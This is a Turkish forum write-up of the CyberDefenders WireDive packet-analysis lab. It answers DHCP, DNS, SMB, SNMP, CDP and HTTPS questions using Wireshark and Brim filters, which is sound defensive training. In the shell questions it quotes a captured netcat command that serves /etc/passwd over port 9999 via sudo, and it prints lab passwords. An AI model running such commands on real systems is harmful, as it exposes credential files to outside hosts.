WireDive CyberDefenders Lab

green.php

Katılımcı Üye
27 Haz 2021
732
874
WireDive, farklı protokollerin ağ üzerinde nasıl göründüğünü anlamanıza yardımcı olmak için çeşitli izler içeren birleşik bir trafik analizi uygulamasıdır, bense bu makaleni yazmak zorunda olan “green.php”.

Bismillah başlayalım, okuyacaklara Allah sabır versin.

İlk Sorumuzda diyorki bize:

File: dhcp.pcapng - What IP address is requested by the client?

Dosya: dhcp.pcapng – Hangi IP adresi client tarafından isteniyor?

3key6g6.PNG

dhcp.pcapng DOSYAMI WİRESHARK'a yansıttım yeşil alanda bağlantılarımı buldum ve ilk sorumun cevabı 192.168.2.244

File: dhcp.pcapng - What is the transaction ID for the DHCP release?

Dosya: dhcp.pcapng - DHCP sürümünün transaction ID’si nedir?

9za2ug7.PNG

WireSharka dhcp.pcapng yansıttım ve arama kısmına dhcp yazdım enterladım karşıma gelen yerde sağ köşede Transaction ID ibaresine baktım

cevabım Transaction ID 0x9f8fa557

File: dhcp.pcapng - What is the MAC address of the client?

Dosya: dhcp.pcapng - İstemcinin MAC adresi nedir?
6b1vp18.PNG

Wireshark'a(DHCP) geri dönelim aşağıda MAC adresimiz sorumuzun cevabı.

File dns.pcapng - What is the response for the lookup for flag.fruitinc.xyz?

Dosya dns.pcapng - flag.fruitinc.xyz’nin response’u nedir?
gso0qye.PNG

7kvvv38.PNG

96bp9y7.PNG

Wireshark'a dns.pcapng dosyamı yansıttım. Sonra flag.fruitinc.xyz ibaremi kolonlar arasında buldum. Sağ tık -> Takip -> UDP Akışı dedim ve cevabım karşımda.

File smb.pcapng - What is the path of the file that is opened?

Dosya smb.pcapng - Açılan dosyanın path’i nedir?
pcjcwiq.PNG

smb.pcapn brim'a yansıttım ara kımsımna şu kodu girdim _path=="smb_files" CTF ipucunada bakarak gelen sonuçlardan ilk kolonumda

HelloWorld\TradeSecrets.txt ibarisini gördüm cevabım bu.

File smb.pcapng - What is the tree that is being browsed?
Dosya smb.pcapng - Göz atılan path nedir?

s0m77d8.PNG

BRİM'İ AÇTIM smb.pcapng arama kısmına _path=="smb_files" yazdım. Çıkan sonuç tablosunda sağa kaydırdım path kolonu altında cevabımı görüyorum.

\\192.168.2.10\public

File smb.pcapng - What is the flag in the file?

Dosya smb.pcapng - Dosyadaki flag nedir?

5pvc9bt.PNG

1yiwblh.PNG

smb.pcapng dosyamı wireshark üzerinde açtım HelloWorld\TradeSecrets.txt ibaresini kolonlarda aradım. Bulduğum ibaremin üzerinde sağ tık

takip -> TCP akışı dedim bulduğum ibarenin flag kısmını sormuştu bana cevabım OneSuperDuperSecret

File shell.pcapng - What is the port for the second shell?

Dosya shell.pcapng - İkinci shell’in portu ne?

1rja0e4.PNG

phigyl2.PNG

shell.pacpnd dosyamı wireshark'a yansıttım arama kısmına tcp.stream eq 0 yazdım morla kaplı alanda harhangi bir ögenin üstüne gelip

sağ tık takip->tcp akışı dedim karşıma çıkan ibareler içerisinde ikinci bir girişim olduğu görünüyor ikinci portu bu olmalı yani cevabım 9999

jtomato@ns01:~$ echo "*umR@Q%4V&RC" | sudo -S nc -nvlp 9999 < /etc/passwd

echo "*umR@Q%4V&RC" | sudo -S nc -nvlp 9999 < /etc/passwd

Listening on [0.0.0.0] (family 0, port 9999)

Connection from 192.168.2.244 34972 received!

jtomato@ns01:~$ exit

File shell.pcapng - What version of netcat is installed?
Dosya shell.pcapng - Netcat'in hangi sürümü yüklü?

erhbpv2.PNG

qzc1gf8.PNG

shell.pacpnd dosyamı wireshark'a yansıttım arama kısmına tcp.stream eq 0 yazdım morla kaplı alanda harhangi bir ögenin üstüne gelip

sağ tık takip->tcp akışı dedim karşıma çıkan ibareler içerisinde netcat'in güncelleme yaptığını hemen önünüde de versiyonunu görebiliriz cevabım 1.10-41.1

Preparing to unpack .../netcat_1.10-41.1_all.deb ...

Unpacking netcat (1.10-41.1) ...

Setting up netcat (1.10-41.1) ...

File shell.pcapng - What file is added to the second shell?

File shell.pcapng - İkinci shell’e hangi dosya eklendi?

ml19cxh.PNG

mq6knhe.PNG

sağ tık takip->tcp akışı dedim karşıma çıkan ibareler içerisinde konumum yazıyor /etc/passwd

jtomato@ns01:~$ echo "*umR@Q%4V&RC" | sudo -S nc -nvlp 9999 < /etc/passwd

File shell.pcapng - What password is used to elevate the shell?

File shell.pcapng – Shell’i yükseltmek için hangi parola kullanıldı?

d03jpqb.PNG

q6ufee8.PNG

sağ tık takip->tcp akışı dedim karşıma çıkan ibareler içerisinde cevabım *umR@Q%4V&RC

Listening on [0.0.0.0] (family 0, port 9999)

O değilde ciddi ciddi buraya kadar dikkatle okuyan varmı aranızda?

File shell.pcapng - What is the OS version of the target system?

Dosya shell.pcapng - Hedef sistemin OS versiyonu nedir?

1wxui2e.PNG

sağ tık takip->tcp akışı dedim karyıma çıkan ibareler içerisinde cevabımı görüyorum; bionic

Index of /ubuntu bionic InRelease

Index of /ubuntu bionic-updates InRelease

Index of /ubuntu bionic-backports InRelease

Index of /ubuntu bionic-security InRelease

File network.pcapng - What is the IPv6 NTP server IP?

File network.pcapng - IPv6 NTP server IP'si nedir?
rmr0wfp.PNG

network.pcapng' imi wireshark'a yansıttım. Arama kısmına IPv6 NTP server IP sorduğu için ipv6.addr yazdım ve gelen kolonlarda soruda geçen ibareler ile aynı olmasın dikkat ettim.

Cevabım destination kolonunda; 2003:51:6012:110::dcf7:123

File network.pcapng - What is the first IP address that is requested by the DHCP client?

file network.pcapng - DHCP istemcisi tarafından request’lenen ilk IP adresi nedir?

pwm28ui.PNG

c6ao75p.PNG

network.pcapng dosyamı brim üzerine yansıttım ve CTF'de DHCP ile ilgili cevap istediği için arama kısmına _path=="dhcp" yazdım

gelen sonuç tablosundan altındaki kolono çift tıkladım ve cevabım; 192.168.20.11

File network.pcapng - What is the first authoritative name server for the domain that is being queried?

File network.pcapng - Sorgulanan alan için ilk domain sunucusu nedir?

a5xhm32.PNG

network.pacpng dosyamı wireshark'a yansıttım ve ctf'de n........ ibaresini kolonlar arasında aramaya başladım cevabım ns1 olarak karşıma çıktı.

File network.pcapng - What is the number of the first VLAN to have a topology change occur?

File network.pcapng - Topoloji değişikliği meydana gelen ilk VLAN'ın numarası nedir?

j2511k0.PNG

c12nzl7.PNG

3mh77cn.PNG

Soruyu tam olarak anlayamadığım için WireShark ile alakalı soruların bulunduğu kısma CTF içerisinde bulunan topology kelimesini yazdım.

Sorular içerisinde gezerken şu cevaba rast geldim. Wireshark Q&A

Link içerisinde şu ibare geçmekte idi "stp.flags.tc==1" gittim wireshark üzerine network.pacpng dosyamı yansıttım ve arama kısmına ibareyi yazdım.

Ve cevabım ID kısmında 20.

Ben hava alıp geliyorum.

File network.pcapng - What is the port for CDP for CCNP-LAB-S2?

File network.pcapng - CCNP-LAB-S2 için CDP port bağlantı noktası nedir?

irjjs9q.PNG

network.pcapng dosyamı wireshark'a yansıttım ve CTF'de benden CDP portunu istediği için arama kısmına CDP yazdım ve cevabım.

GigabitEthernet0/2

File network.pcapng - What is the IOS version running on CCNP-LAB-S2?

File network.pcapng - CCNP-LAB-S2’de çalışan IOS sürümü nedir?

dxyz22g.PNG

network.pcapng dosyamı wireshark üzerine yansıttım ve arama kısmına cdp yazdım ilk satırı seçtim ve aşağı baktım. Cisco Discovery Protocol ibaresini seçtim. Sonra

Software Version ibaresini beçtim cevabım karşımda: 12.1(22)EA14

File network.pcapng - How many router solicitations were sent?

File network.pcapng - Kaç tane router solicitation gönderildi?

jsncoyy.PNG

ig6eb23.PNG

h8vv23z.PNG

network.pcapng dosyamı wireshark'a yansıttım ve üst sorularda yaptığım gibi Wireshark Q&A adresinde arama kısmında CTF içerisinde bulunan

anahtar kelimeleri yazdım (router solicitation) konular arasında gezerken şu cevaba denk geldim Wireshark Q&A

az aşağıdaki cevaplarda icmpv6.type == 133 ibaresini gördüm ve wireshark arama kısmına bu ibareyi yazınca sorumun cevabıda karşıma çıktı:3 adet.

File network.pcapng - What is the management address of CCNP-LAB-S2?

File network.pcapng - CCNP-LAB-S2'nin yönetim adresi nedir?

1mo9obl.PNG

network.pcapng dosyamı wireshark'a yansıttım ve CTF içerisinde geçen CCNP-LAB ibaresinin bir üst sorularda olduğu gibi CDP paketleri ile alakalı bir soru

olduğu mantığını yürüttüm. Arama kısmına cdp yazdım ve CCNP-LAB-S2 ibaresi geçen ilk kolondan bir satır seçtim. Adres sorduğu için alt kolonda yer alan kısımdan

Cisco Discovery Protocol -> Adresses kısmına gittim ve cevabım; 192.168.121.20

File network.pcapng - What is the interface being reported on in the first snmp query?

file network.pcapng - İlk snmp query’sinde raporlanan interface nedir?

6ktktw9.PNG

network.pcapng WİRESHARK'a yansıttım ve snmp paketlerinen bahsettiği için arama kısmına snmp yazdım. İnfo kısmından get response

ibaresi geçen kolonudan herhangi birini seçtim aşağıda yer alan kısımdan Simple Network Management Protocol -> data: get response -> variable-bindinggs: 4 items seçtim ve cevabım: Fa0/1

File network.pcapng - When was the NVRAM config last updated?

File network.pcapng - NVRAM config en son ne zaman güncellendi?

1ue9wx4.PNG

gh1q85z.PNG

o6fotf5.PNG

5b8rob2.PNG

network.pcapng dosyamı wireshark'a yansıttım ve üst tarafta bulunan Düzenle -> Paket Bul seçeneğini işaretledim ayarlar görsellerdeki gibi olmalı.

Buraya kadar okuyanlara Reverse Green’e erken erişim imkanı.

Sonda CTF ibaresinde geçen nvram yazısını ilgili yerde arattım ve karyıma çıkan sonuç ekranında seçili olan yerde Fare Sağ Tık -> Takip -> UDP akışı dedim ve karşıma gelen menüde son güncelleme tarihi saati ile birlikte.

File network.pcapng - What is the ip of the radius server?

File network.pcapng – radius serverin ip’si nedir?

dr7v1va.PNG

b5kkxso.PNG

g3t6ap3.PNG

aojeztt.PNG

Yukarıdaki işlemlerin aynısını yaptıktan sonra az aşağı indim ve cevabım IPv6 içerisinde; 2001:DB8::1812

File https.pcapng - What is the username and password to login to 192.168.2.1? Format: 'username:password' without quotes.

Dosya https.pcapng - 192.168.2.1'de oturum açmak için kullanıcı adı ve şifre nedir? Biçim: 'kullanıcı adı:şifre' tırnak işaretleri olmadan.

https.pcapng dosyamı wireshark'a yansıttım arama kısmına ip.addr == 192.168.2.1 yazdım UDP ve TCP akışları arasında gezerken cevabımın

admin:Ac5R4D9iyqD5bSh olduğunu gördüm.

File https.pcapng - What is the certStatus for the certificate with a serial number of 07752cebe5222fcf5c7d2038984c5198?

Dosya https.pcapng - 07752cebe5222fcf5c7d2038984c5198 seri numaralı sertifikanın certStatus'u nedir?

iub3j9c.PNG

k4z8a3d.PNG

https.pcapng dosaymı wireshark'a yansıttım ve yukarıda bahsi geçen arama işlemleri kısmının aynısı yaptım. Arama ayarlarım görseldeki gibidir.

Daha sonra arama kısmına CTF içerisinde geçen 07752cebe5222fcf5c7d2038984c5198 ibaresini arattım ve buldu. Kodu incelediğimde seri numaranın mozilla üzerinde gerçekleştiğini gördüm.

Cert Status'u sormuştu cevabım good.

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.